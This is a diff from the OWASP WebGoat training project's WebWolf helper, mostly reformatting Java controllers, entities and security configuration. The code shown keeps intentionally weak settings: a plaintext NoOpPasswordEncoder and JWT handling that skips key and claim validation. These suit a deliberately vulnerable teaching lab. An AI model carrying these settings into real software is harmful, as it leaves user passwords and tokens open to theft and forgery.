-        auth.userDetailsService(userDetailsService); //.passwordEncoder(bCryptPasswordEncoder());
-    }
+  @Autowired
+  public void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {
+    auth.userDetailsService(userDetailsService); // .passwordEncoder(bCryptPasswordEncoder());
+  }
 
-    @Bean
-    @Override
-    public UserDetailsService userDetailsServiceBean() throws Exception {
-        return userDetailsService;
-    }
+  @Bean
+  @Override
+  public UserDetailsService userDetailsServiceBean() throws Exception {
+    return userDetailsService;
+  }
 
-    @Override
-    @Bean
-    protected AuthenticationManager authenticationManager() throws Exception {
-        return super.authenticationManager();
-    }
+  @Override
+  @Bean
+  protected AuthenticationManager authenticationManager() throws Exception {
+    return super.authenticationManager();
+  }
 
-    @Bean
-    public NoOpPasswordEncoder passwordEncoder() {
-        return (NoOpPasswordEncoder) NoOpPasswordEncoder.getInstance();
-    }
+  @Bean
+  public NoOpPasswordEncoder passwordEncoder() {
+    return (NoOpPasswordEncoder) NoOpPasswordEncoder.getInstance();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/WebWolf.java b/src/main/java/org/owasp/webgoat/webwolf/WebWolf.java
index 25429a664..fa5d488a3 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/WebWolf.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/WebWolf.java
@@ -36,9 +36,8 @@ import org.springframework.context.annotation.PropertySource;
 @EnableAutoConfiguration
 public class WebWolf {
 
-    @Bean
-    public HttpTraceRepository traceRepository() {
-        return new WebWolfTraceRepository();
-    }
-
+  @Bean
+  public HttpTraceRepository traceRepository() {
+    return new WebWolfTraceRepository();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTController.java b/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTController.java
index bc5c5f5c4..7d7ab61ba 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTController.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTController.java
@@ -1,5 +1,8 @@
 package org.owasp.webgoat.webwolf.jwt;
 
+import static org.springframework.http.MediaType.APPLICATION_FORM_URLENCODED_VALUE;
+import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
+
 import org.springframework.util.MultiValueMap;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.PostMapping;
@@ -7,30 +10,32 @@ import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.servlet.ModelAndView;
 
-import static org.springframework.http.MediaType.APPLICATION_FORM_URLENCODED_VALUE;
-import static org.springframework.http.MediaType.APPLICATION_JSON_VALUE;
-
 @RestController
 public class JWTController {
 
-    @GetMapping("/jwt")
-    public ModelAndView jwt() {
-        return new ModelAndView("jwt");
-    }
+  @GetMapping("/jwt")
+  public ModelAndView jwt() {
+    return new ModelAndView("jwt");
+  }
 
-    @PostMapping(value = "/jwt/decode", consumes = APPLICATION_FORM_URLENCODED_VALUE, produces = APPLICATION_JSON_VALUE)
-    public JWTToken decode(@RequestBody MultiValueMap<String, String> formData) {
-        var jwt = formData.getFirst("token");
-        var secretKey = formData.getFirst("secretKey");
-        return JWTToken.decode(jwt, secretKey);
-    }
-
-    @PostMapping(value = "/jwt/encode", consumes = APPLICATION_FORM_URLENCODED_VALUE, produces = APPLICATION_JSON_VALUE)
-    public JWTToken encode(@RequestBody MultiValueMap<String, String> formData) {
-        var header = formData.getFirst("header");
-        var payload = formData.getFirst("payload");
-        var secretKey = formData.getFirst("secretKey");
-        return JWTToken.encode(header, payload, secretKey);
-    }
+  @PostMapping(
+      value = "/jwt/decode",
+      consumes = APPLICATION_FORM_URLENCODED_VALUE,
+      produces = APPLICATION_JSON_VALUE)
+  public JWTToken decode(@RequestBody MultiValueMap<String, String> formData) {
+    var jwt = formData.getFirst("token");
+    var secretKey = formData.getFirst("secretKey");
+    return JWTToken.decode(jwt, secretKey);
+  }
 
+  @PostMapping(
+      value = "/jwt/encode",
+      consumes = APPLICATION_FORM_URLENCODED_VALUE,
+      produces = APPLICATION_JSON_VALUE)
+  public JWTToken encode(@RequestBody MultiValueMap<String, String> formData) {
+    var header = formData.getFirst("header");
+    var payload = formData.getFirst("payload");
+    var secretKey = formData.getFirst("secretKey");
+    return JWTToken.encode(header, payload, secretKey);
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTToken.java b/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTToken.java
index ced8fcbf6..88fcdc1c5 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTToken.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/jwt/JWTToken.java
@@ -1,7 +1,13 @@
 package org.owasp.webgoat.webwolf.jwt;
 
+import static java.nio.charset.StandardCharsets.UTF_8;
+import static org.springframework.util.Base64Utils.decodeFromUrlSafeString;
+import static org.springframework.util.StringUtils.hasText;
+
 import com.fasterxml.jackson.core.JsonProcessingException;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import java.util.Map;
+import java.util.TreeMap;
 import lombok.AllArgsConstructor;
 import lombok.Builder;
 import lombok.Getter;
@@ -15,14 +21,6 @@ import org.jose4j.jwx.CompactSerializer;
 import org.jose4j.keys.HmacKey;
 import org.jose4j.lang.JoseException;
 
-import java.util.Map;
-import java.util.TreeMap;
-
-import static java.nio.charset.StandardCharsets.UTF_8;
-import static org.jose4j.jwx.CompactSerializer.serialize;
-import static org.springframework.util.Base64Utils.decodeFromUrlSafeString;
-import static org.springframework.util.StringUtils.hasText;
-
 @NoArgsConstructor
 @AllArgsConstructor
 @Getter
@@ -30,108 +28,111 @@ import static org.springframework.util.StringUtils.hasText;
 @Builder(toBuilder = true)
 public class JWTToken {
 
-    private String encoded = "";
-    private String secretKey;
-    private String header;
-    private boolean validHeader;
-    private boolean validPayload;
-    private boolean validToken;
-    private String payload;
-    private boolean signatureValid = true;
+  private String encoded = "";
+  private String secretKey;
+  private String header;
+  private boolean validHeader;
+  private boolean validPayload;
+  private boolean validToken;
+  private String payload;
+  private boolean signatureValid = true;
 
-    public static JWTToken decode(String jwt, String secretKey) {
-        var token = parseToken(jwt.trim().replace(System.getProperty("line.separator"), ""));
-        return token.toBuilder().signatureValid(validateSignature(secretKey, jwt)).build();
+  public static JWTToken decode(String jwt, String secretKey) {
+    var token = parseToken(jwt.trim().replace(System.getProperty("line.separator"), ""));
+    return token.toBuilder().signatureValid(validateSignature(secretKey, jwt)).build();
+  }
+
+  private static Map<String, Object> parse(String header) {
+    var reader = new ObjectMapper();
+    try {
+      return reader.readValue(header, TreeMap.class);
+    } catch (JsonProcessingException e) {
+      return Map.of();
+    }
+  }
+
+  private static String write(String originalValue, Map<String, Object> data) {
+    var writer = new ObjectMapper().writerWithDefaultPrettyPrinter();
+    try {
+      if (data.isEmpty()) {
+        return originalValue;
+      }
+      return writer.writeValueAsString(data);
+    } catch (JsonProcessingException e) {
+      return originalValue;
+    }
+  }
+
+  public static JWTToken encode(String header, String payloadAsString, String secretKey) {
+    var headers = parse(header);
+    var payload = parse(payloadAsString);
+
+    var builder =
+        JWTToken.builder()
+            .header(write(header, headers))
+            .payload(write(payloadAsString, payload))
+            .validHeader(!hasText(header) || !headers.isEmpty())
+            .validToken(true)
+            .validPayload(!hasText(payloadAsString) || !payload.isEmpty());
+
+    JsonWebSignature jws = new JsonWebSignature();
+    jws.setPayload(payloadAsString);
+    headers.forEach((k, v) -> jws.setHeader(k, v));
+    if (!headers.isEmpty()) { // otherwise e30 meaning {} will be shown as header
+      builder.encoded(
+          CompactSerializer.serialize(
+              new String[] {jws.getHeaders().getEncodedHeader(), jws.getEncodedPayload()}));
     }
 
-    private static Map<String, Object> parse(String header) {
-        var reader = new ObjectMapper();
-        try {
-            return reader.readValue(header, TreeMap.class);
-        } catch (JsonProcessingException e) {
-            return Map.of();
-        }
+    // Only sign when valid header and payload
+    if (!headers.isEmpty() && !payload.isEmpty() && hasText(secretKey)) {
+      jws.setDoKeyValidation(false);
+      jws.setKey(new HmacKey(secretKey.getBytes(UTF_8)));
+      try {
+        builder.encoded(jws.getCompactSerialization());
+        builder.signatureValid(true);
+      } catch (JoseException e) {
+        // Do nothing
+      }
     }
+    return builder.build();
+  }
 
-    private static String write(String originalValue, Map<String, Object> data) {
-        var writer = new ObjectMapper().writerWithDefaultPrettyPrinter();
-        try {
-            if (data.isEmpty()) {
-                return originalValue;
-            }
-            return writer.writeValueAsString(data);
-        } catch (JsonProcessingException e) {
-            return originalValue;
-        }
+  private static JWTToken parseToken(String jwt) {
+    var token = jwt.split("\\.");
+    var builder = JWTToken.builder().encoded(jwt);
+
+    if (token.length >= 2) {
+      var header = new String(decodeFromUrlSafeString(token[0]), UTF_8);
+      var payloadAsString = new String(decodeFromUrlSafeString(token[1]), UTF_8);
+      var headers = parse(header);
+      var payload = parse(payloadAsString);
+      builder.header(write(header, headers));
+      builder.payload(write(payloadAsString, payload));
+      builder.validHeader(!headers.isEmpty());
+      builder.validPayload(!payload.isEmpty());
+      builder.validToken(!headers.isEmpty() && !payload.isEmpty());
+    } else {
+      builder.validToken(false);
     }
+    return builder.build();
+  }
 
-    public static JWTToken encode(String header, String payloadAsString, String secretKey) {
-        var headers = parse(header);
-        var payload = parse(payloadAsString);
-
-        var builder = JWTToken.builder()
-                .header(write(header, headers))
-                .payload(write(payloadAsString, payload))
-                .validHeader(!hasText(header) || !headers.isEmpty())
-                .validToken(true)
-                .validPayload(!hasText(payloadAsString) || !payload.isEmpty());
-
-        JsonWebSignature jws = new JsonWebSignature();
-        jws.setPayload(payloadAsString);
-        headers.forEach((k, v) -> jws.setHeader(k, v));
-        if (!headers.isEmpty()) { //otherwise e30 meaning {} will be shown as header
-            builder.encoded(CompactSerializer.serialize(new String[]{jws.getHeaders().getEncodedHeader(), jws.getEncodedPayload()}));
-        }
-
-        //Only sign when valid header and payload
-        if (!headers.isEmpty() && !payload.isEmpty() && hasText(secretKey)) {
-            jws.setDoKeyValidation(false);
-            jws.setKey(new HmacKey(secretKey.getBytes(UTF_8)));
-            try {
-                builder.encoded(jws.getCompactSerialization());
-                builder.signatureValid(true);
-            } catch (JoseException e) {
-                //Do nothing
-            }
-        }
-        return builder.build();
-    }
-
-    private static JWTToken parseToken(String jwt) {
-        var token = jwt.split("\\.");
-        var builder = JWTToken.builder().encoded(jwt);
-
-        if (token.length >= 2) {
-            var header = new String(decodeFromUrlSafeString(token[0]), UTF_8);
-            var payloadAsString = new String(decodeFromUrlSafeString(token[1]), UTF_8);
-            var headers = parse(header);
-            var payload = parse(payloadAsString);
-            builder.header(write(header, headers));
-            builder.payload(write(payloadAsString, payload));
-            builder.validHeader(!headers.isEmpty());
-            builder.validPayload(!payload.isEmpty());
-            builder.validToken(!headers.isEmpty() && !payload.isEmpty());
-        } else {
-            builder.validToken(false);
-        }
-        return builder.build();
-    }
-
-    private static boolean validateSignature(String secretKey, String jwt) {
-        if (hasText(secretKey)) {
-            JwtConsumer jwtConsumer = new JwtConsumerBuilder()
-                    .setSkipAllValidators()
-                    .setVerificationKey(new HmacKey(secretKey.getBytes(UTF_8)))
-                    .setRelaxVerificationKeyValidation()
-                    .build();
-            try {
-                jwtConsumer.processToClaims(jwt);
-                return true;
-            } catch (InvalidJwtException e) {
-                return false;
-            }
-        }
+  private static boolean validateSignature(String secretKey, String jwt) {
+    if (hasText(secretKey)) {
+      JwtConsumer jwtConsumer =
+          new JwtConsumerBuilder()
+              .setSkipAllValidators()
+              .setVerificationKey(new HmacKey(secretKey.getBytes(UTF_8)))
+              .setRelaxVerificationKeyValidation()
+              .build();
+      try {
+        jwtConsumer.processToClaims(jwt);
+        return true;
+      } catch (InvalidJwtException e) {
         return false;
+      }
     }
-
+    return false;
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/mailbox/Email.java b/src/main/java/org/owasp/webgoat/webwolf/mailbox/Email.java
index 8b009ceae..4cca7856b 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/mailbox/Email.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/mailbox/Email.java
@@ -23,16 +23,15 @@
 package org.owasp.webgoat.webwolf.mailbox;
 
 import com.fasterxml.jackson.annotation.JsonIgnore;
+import java.io.Serializable;
+import java.time.LocalDateTime;
+import java.time.format.DateTimeFormatter;
+import javax.persistence.*;
 import lombok.AllArgsConstructor;
 import lombok.Builder;
 import lombok.Data;
 import lombok.NoArgsConstructor;
 
-import javax.persistence.*;
-import java.io.Serializable;
-import java.time.LocalDateTime;
-import java.time.format.DateTimeFormatter;
-
 /**
  * @author nbaars
  * @since 8/20/17.
@@ -44,31 +43,32 @@ import java.time.format.DateTimeFormatter;
 @NoArgsConstructor
 public class Email implements Serializable {
 
-    @Id
-    @GeneratedValue(strategy = GenerationType.IDENTITY)
-    private Long id;
-    @JsonIgnore
-    private LocalDateTime time = LocalDateTime.now();
-    @Column(length = 1024)
-    private String contents;
-    private String sender;
-    private String title;
-    private String recipient;
+  @Id
+  @GeneratedValue(strategy = GenerationType.IDENTITY)
+  private Long id;
 
-    public String getSummary() {
-        return "-" + this.contents.substring(0, Math.min(50, contents.length()));
-    }
+  @JsonIgnore private LocalDateTime time = LocalDateTime.now();
 
-    public LocalDateTime getTimestamp() {
-        return time;
-    }
+  @Column(length = 1024)
+  private String contents;
 
-    public String getTime() {
-        return DateTimeFormatter.ofPattern("h:mm a").format(time);
-    }
+  private String sender;
+  private String title;
+  private String recipient;
 
-    public String getShortSender() {
-        return sender.substring(0, sender.indexOf("@"));
-    }
+  public String getSummary() {
+    return "-" + this.contents.substring(0, Math.min(50, contents.length()));
+  }
 
+  public LocalDateTime getTimestamp() {
+    return time;
+  }
+
+  public String getTime() {
+    return DateTimeFormatter.ofPattern("h:mm a").format(time);
+  }
+
+  public String getShortSender() {
+    return sender.substring(0, sender.indexOf("@"));
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxController.java b/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxController.java
index 6f1fbafdf..6a3640bfd 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxController.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxController.java
@@ -22,6 +22,7 @@
 
 package org.owasp.webgoat.webwolf.mailbox;
 
+import java.util.List;
 import lombok.AllArgsConstructor;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.http.HttpStatus;
@@ -34,32 +35,30 @@ import org.springframework.web.bind.annotation.RequestBody;
 import org.springframework.web.bind.annotation.RestController;
 import org.springframework.web.servlet.ModelAndView;
 
-import java.util.List;
-
 @RestController
 @AllArgsConstructor
 @Slf4j
 public class MailboxController {
 
-    private final MailboxRepository mailboxRepository;
+  private final MailboxRepository mailboxRepository;
 
-    @GetMapping(value = "/mail")
-    public ModelAndView mail() {
-        UserDetails user = (UserDetails) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
-        ModelAndView modelAndView = new ModelAndView();
-        List<Email> emails = mailboxRepository.findByRecipientOrderByTimeDesc(user.getUsername());
-        if (emails != null && !emails.isEmpty()) {
-            modelAndView.addObject("total", emails.size());
-            modelAndView.addObject("emails", emails);
-        }
-        modelAndView.setViewName("mailbox");
-        return modelAndView;
-    }
-
-    @PostMapping(value = "/mail")
-    public ResponseEntity<?> sendEmail(@RequestBody Email email) {
-        mailboxRepository.save(email);
-        return ResponseEntity.status(HttpStatus.CREATED).build();
+  @GetMapping(value = "/mail")
+  public ModelAndView mail() {
+    UserDetails user =
+        (UserDetails) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
+    ModelAndView modelAndView = new ModelAndView();
+    List<Email> emails = mailboxRepository.findByRecipientOrderByTimeDesc(user.getUsername());
+    if (emails != null && !emails.isEmpty()) {
+      modelAndView.addObject("total", emails.size());
+      modelAndView.addObject("emails", emails);
     }
+    modelAndView.setViewName("mailbox");
+    return modelAndView;
+  }
 
+  @PostMapping(value = "/mail")
+  public ResponseEntity<?> sendEmail(@RequestBody Email email) {
+    mailboxRepository.save(email);
+    return ResponseEntity.status(HttpStatus.CREATED).build();
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepository.java b/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepository.java
index 436498dab..b1979ada8 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepository.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/mailbox/MailboxRepository.java
@@ -22,9 +22,8 @@
 
 package org.owasp.webgoat.webwolf.mailbox;
 
-import org.springframework.data.jpa.repository.JpaRepository;
-
 import java.util.List;
+import org.springframework.data.jpa.repository.JpaRepository;
 
 /**
  * @author nbaars
@@ -32,6 +31,5 @@ import java.util.List;
  */
 public interface MailboxRepository extends JpaRepository<Email, String> {
 
-    List<Email> findByRecipientOrderByTimeDesc(String recipient);
-
+  List<Email> findByRecipientOrderByTimeDesc(String recipient);
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/requests/LandingPage.java b/src/main/java/org/owasp/webgoat/webwolf/requests/LandingPage.java
index 763340376..6d46c014f 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/requests/LandingPage.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/requests/LandingPage.java
@@ -22,26 +22,31 @@
 
 package org.owasp.webgoat.webwolf.requests;
 
+import java.util.concurrent.Callable;
+import javax.servlet.http.HttpServletRequest;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.http.ResponseEntity;
 import org.springframework.stereotype.Controller;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
 
-import javax.servlet.http.HttpServletRequest;
-import java.util.concurrent.Callable;
-
 @Controller
 @Slf4j
 @RequestMapping("/landing/**")
 public class LandingPage {
 
-    @RequestMapping(method = {RequestMethod.POST, RequestMethod.GET, RequestMethod.DELETE, RequestMethod.PATCH, RequestMethod.PUT})
-    public Callable<ResponseEntity<?>> ok(HttpServletRequest request) {
-        return () -> {
-            log.trace("Incoming request for: {}", request.getRequestURL());
-            return ResponseEntity.ok().build();
-        };
-    }
-
+  @RequestMapping(
+      method = {
+        RequestMethod.POST,
+        RequestMethod.GET,
+        RequestMethod.DELETE,
+        RequestMethod.PATCH,
+        RequestMethod.PUT
+      })
+  public Callable<ResponseEntity<?>> ok(HttpServletRequest request) {
+    return () -> {
+      log.trace("Incoming request for: {}", request.getRequestURL());
+      return ResponseEntity.ok().build();
+    };
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/requests/Requests.java b/src/main/java/org/owasp/webgoat/webwolf/requests/Requests.java
index 54c623dd2..f510ed7e9 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/requests/Requests.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/requests/Requests.java
@@ -22,8 +22,11 @@
 
 package org.owasp.webgoat.webwolf.requests;
 
+import static java.util.stream.Collectors.toList;
+
 import com.fasterxml.jackson.core.JsonProcessingException;
 import com.fasterxml.jackson.databind.ObjectMapper;
+import java.time.Instant;
 import lombok.AllArgsConstructor;
 import lombok.Getter;
 import lombok.RequiredArgsConstructor;
@@ -38,13 +41,8 @@ import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.servlet.ModelAndView;
 
-import java.time.Instant;
-
-import static java.util.stream.Collectors.toList;
-
 /**
- * Controller for fetching all the HTTP requests from WebGoat to WebWolf for a specific
- * user.
+ * Controller for fetching all the HTTP requests from WebGoat to WebWolf for a specific user.
  *
  * @author nbaars
  * @since 8/13/17.
@@ -55,52 +53,58 @@ import static java.util.stream.Collectors.toList;
 @RequestMapping(value = "/requests")
 public class Requests {
 
-    private final WebWolfTraceRepository traceRepository;
-    private final ObjectMapper objectMapper;
+  private final WebWolfTraceRepository traceRepository;
+  private final ObjectMapper objectMapper;
 
-    @AllArgsConstructor
-    @Getter
-    private class Tracert {
-        private final Instant date;
-        private final String path;
-        private final String json;
+  @AllArgsConstructor
+  @Getter
+  private class Tracert {
+    private final Instant date;
+    private final String path;
+    private final String json;
+  }
+
+  @GetMapping
+  public ModelAndView get() {
+    var model = new ModelAndView("requests");
+    var user = (UserDetails) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
+    var traces =
+        traceRepository.findAllTraces().stream()
+            .filter(t -> allowedTrace(t, user))
+            .map(t -> new Tracert(t.getTimestamp(), path(t), toJsonString(t)))
+            .collect(toList());
+    model.addObject("traces", traces);
+
+    return model;
+  }
+
+  private boolean allowedTrace(HttpTrace t, UserDetails user) {
+    Request req = t.getRequest();
+    boolean allowed = true;
+    /* do not show certain traces to other users in a classroom setup */
+    if (req.getUri().getPath().contains("/files")
+        && !req.getUri().getPath().contains(user.getUsername())) {
+      allowed = false;
+    } else if (req.getUri().getPath().contains("/landing")
+        && req.getUri().getQuery() != null
+        && req.getUri().getQuery().contains("uniqueCode")
+        && !req.getUri().getQuery().contains(StringUtils.reverse(user.getUsername()))) {
+      allowed = false;
     }
 
-    @GetMapping
-    public ModelAndView get() {
-        var model = new ModelAndView("requests");
-        var user = (UserDetails) SecurityContextHolder.getContext().getAuthentication().getPrincipal();
-        var traces = traceRepository.findAllTraces().stream()
-        		.filter(t -> allowedTrace(t, user))
-                .map(t -> new Tracert(t.getTimestamp(), path(t), toJsonString(t))).collect(toList());
-        model.addObject("traces", traces);
+    return allowed;
+  }
 
-        return model;
-    }
-    
-    private boolean allowedTrace(HttpTrace t, UserDetails user) {
-    	Request req = t.getRequest();
-    	boolean allowed = true;
-    	/* do not show certain traces to other users in a classroom setup */
-    	if (req.getUri().getPath().contains("/files") && !req.getUri().getPath().contains(user.getUsername())) {
-    		allowed = false;
-    	} else if (req.getUri().getPath().contains("/landing") && req.getUri().getQuery()!=null && req.getUri().getQuery().contains("uniqueCode") && !req.getUri().getQuery().contains(StringUtils.reverse(user.getUsername()))) {
-    		allowed = false;
-    	}
-    	    	
-    	return allowed;
-    }
+  private String path(HttpTrace t) {
+    return (String) t.getRequest().getUri().getPath();
+  }
 
-    private String path(HttpTrace t) {
-        return (String) t.getRequest().getUri().getPath();
-    }
-
-    private String toJsonString(HttpTrace t) {
-        try {
-            return objectMapper.writeValueAsString(t);
-        } catch (JsonProcessingException e) {
-            log.error("Unable to create json", e);
-        }
-        return "No request(s) found";
+  private String toJsonString(HttpTrace t) {
+    try {
+      return objectMapper.writeValueAsString(t);
+    } catch (JsonProcessingException e) {
+      log.error("Unable to create json", e);
     }
+    return "No request(s) found";
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/requests/WebWolfTraceRepository.java b/src/main/java/org/owasp/webgoat/webwolf/requests/WebWolfTraceRepository.java
index 5c117b666..bba73a890 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/requests/WebWolfTraceRepository.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/requests/WebWolfTraceRepository.java
@@ -23,14 +23,12 @@
 package org.owasp.webgoat.webwolf.requests;
 
 import com.google.common.collect.EvictingQueue;
-import com.google.common.collect.Lists;
+import java.util.ArrayList;
+import java.util.List;
 import lombok.extern.slf4j.Slf4j;
 import org.springframework.boot.actuate.trace.http.HttpTrace;
 import org.springframework.boot.actuate.trace.http.HttpTraceRepository;
 
-import java.util.ArrayList;
-import java.util.List;
-
 /**
  * Keep track of all the incoming requests, we are only keeping track of request originating from
  * WebGoat.
@@ -41,28 +39,38 @@ import java.util.List;
 @Slf4j
 public class WebWolfTraceRepository implements HttpTraceRepository {
 
-    private final EvictingQueue<HttpTrace> traces = EvictingQueue.create(10000);
-    private final List<String> exclusionList = List.of("/tmpdir", "/home", "/files",
-            "/images/", "/favicon.ico", "/js/", "/webjars/", "/requests", "/css/", "/mail");
+  private final EvictingQueue<HttpTrace> traces = EvictingQueue.create(10000);
+  private final List<String> exclusionList =
+      List.of(
+          "/tmpdir",
+          "/home",
+          "/files",
+          "/images/",
+          "/favicon.ico",
+          "/js/",
+          "/webjars/",
+          "/requests",
+          "/css/",
+          "/mail");
 
-    @Override
-    public List<HttpTrace> findAll() {
-        return List.of();
-    }
+  @Override
+  public List<HttpTrace> findAll() {
+    return List.of();
+  }
 
-    public List<HttpTrace> findAllTraces() {
-        return new ArrayList<>(traces);
-    }
+  public List<HttpTrace> findAllTraces() {
+    return new ArrayList<>(traces);
+  }
 
-    private boolean isInExclusionList(String path) {
-        return exclusionList.stream().anyMatch(e -> path.contains(e));
-    }
+  private boolean isInExclusionList(String path) {
+    return exclusionList.stream().anyMatch(e -> path.contains(e));
+  }
 
-    @Override
-    public void add(HttpTrace httpTrace) {
-        var path = httpTrace.getRequest().getUri().getPath();
-        if (!isInExclusionList(path)) {
-            traces.add(httpTrace);
-        }
+  @Override
+  public void add(HttpTrace httpTrace) {
+    var path = httpTrace.getRequest().getUri().getPath();
+    if (!isInExclusionList(path)) {
+      traces.add(httpTrace);
     }
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/user/UserRepository.java b/src/main/java/org/owasp/webgoat/webwolf/user/UserRepository.java
index 33332a53e..c7e87b559 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/user/UserRepository.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/user/UserRepository.java
@@ -30,5 +30,5 @@ import org.springframework.data.jpa.repository.JpaRepository;
  */
 public interface UserRepository extends JpaRepository<WebGoatUser, String> {
 
-    WebGoatUser findByUsername(String username);
+  WebGoatUser findByUsername(String username);
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/user/UserService.java b/src/main/java/org/owasp/webgoat/webwolf/user/UserService.java
index d0799c5b1..a57980e9c 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/user/UserService.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/user/UserService.java
@@ -33,24 +33,23 @@ import org.springframework.stereotype.Service;
 @Service
 public class UserService implements UserDetailsService {
 
-    private UserRepository userRepository;
+  private UserRepository userRepository;
 
-    public UserService(UserRepository userRepository) {
-        this.userRepository = userRepository;
+  public UserService(UserRepository userRepository) {
+    this.userRepository = userRepository;
+  }
+
+  @Override
+  public WebGoatUser loadUserByUsername(final String username) throws UsernameNotFoundException {
+    WebGoatUser webGoatUser = userRepository.findByUsername(username);
+    if (webGoatUser == null) {
+      throw new UsernameNotFoundException("User not found");
     }
+    webGoatUser.createUser();
+    return webGoatUser;
+  }
 
-    @Override
-    public WebGoatUser loadUserByUsername(final String username) throws UsernameNotFoundException {
-        WebGoatUser webGoatUser = userRepository.findByUsername(username);
-        if (webGoatUser == null) {
-            throw new UsernameNotFoundException("User not found");
-        }
-        webGoatUser.createUser();
-        return webGoatUser;
-    }
-
-
-    public void addUser(final String username, final String password) {
-        userRepository.save(new WebGoatUser(username, password));
-    }
+  public void addUser(final String username, final String password) {
+    userRepository.save(new WebGoatUser(username, password));
+  }
 }
diff --git a/src/main/java/org/owasp/webgoat/webwolf/user/WebGoatUser.java b/src/main/java/org/owasp/webgoat/webwolf/user/WebGoatUser.java
index e9da6eaf4..d432ff925 100644
--- a/src/main/java/org/owasp/webgoat/webwolf/user/WebGoatUser.java
+++ b/src/main/java/org/owasp/webgoat/webwolf/user/WebGoatUser.java
@@ -22,17 +22,15 @@
 
 package org.owasp.webgoat.webwolf.user;
 
-import lombok.Getter;
-import org.springframework.security.core.GrantedAuthority;
-import org.springframework.security.core.authority.SimpleGrantedAuthority;
-import org.springframework.security.core.userdetails.User;
-import org.springframework.security.core.userdetails.UserDetails;
-
+import java.util.Collection;
+import java.util.Collections;
 import javax.persistence.Entity;
 import javax.persistence.Id;
 import javax.persistence.Transient;
-import java.util.Collection;
-import java.util.Collections;
+import lombok.Getter;
+import org.springframework.security.core.GrantedAuthority;
+import org.springframework.security.core.userdetails.User;
+import org.springframework.security.core.userdetails.UserDetails;
 
 /**
  * @author nbaars
@@ -42,48 +40,43 @@ import java.util.Collections;
 @Entity
 public class WebGoatUser implements UserDetails {
 
-    @Id
-    private String username;
-    private String password;
-    @Transient
-    private User user;
+  @Id private String username;
+  private String password;
+  @Transient private User user;
 
-    protected WebGoatUser() {
-    }
+  protected WebGoatUser() {}
 
-    public WebGoatUser(String username, String password) {
-        this.username = username;
-        this.password = password;
-        createUser();
-    }
+  public WebGoatUser(String username, String password) {
+    this.username = username;
+    this.password = password;
+    createUser();
+  }
 
-    public void createUser() {
-        this.user = new User(username, password, getAuthorities());
-    }
+  public void createUser() {
+    this.user = new User(username, password, getAuthorities());
+  }
 
-    public Collection<? extends GrantedAuthority> getAuthorities() {
-        return Collections.emptyList();
-    }
+  public Collection<? extends GrantedAuthority> getAuthorities() {
+    return Collections.emptyList();
+  }
 
-    @Override
-    public boolean isAccountNonExpired() {
-        return this.user.isAccountNonExpired();
-    }
+  @Override
+  public boolean isAccountNonExpired() {
+    return this.user.isAccountNonExpired();
+  }
 
-    @Override
-    public boolean isAccountNonLocked() {
-        return this.user.isAccountNonLocked();
-    }
+  @Override
+  public boolean isAccountNonLocked() {
+    return this.user.isAccountNonLocked();
+  }
 
-    @Override
-    public boolean isCredentialsNonExpired() {
-        return this.user.isCredentialsNonExpired();
-    }
+  @Override
+  public boolean isCredentialsNonExpired() {
+    return this.user.isCredentialsNonExpired();
+  }
 
-    @Override
-    public boolean isEnabled() {
-        return this.user.isEnabled();
-    }
+  @Override
+  public boolean isEnabled() {
+    return this.user.isEnabled();
+  }
 }
-
-
diff --git a/src/test/java/org/owasp/webgoat/container/WebGoatApplication.java b/src/test/java/org/owasp/webgoat/container/WebGoatApplication.java
index 0fd8e65c1..49e287a30 100644
--- a/src/test/java/org/owasp/webgoat/container/WebGoatApplication.java
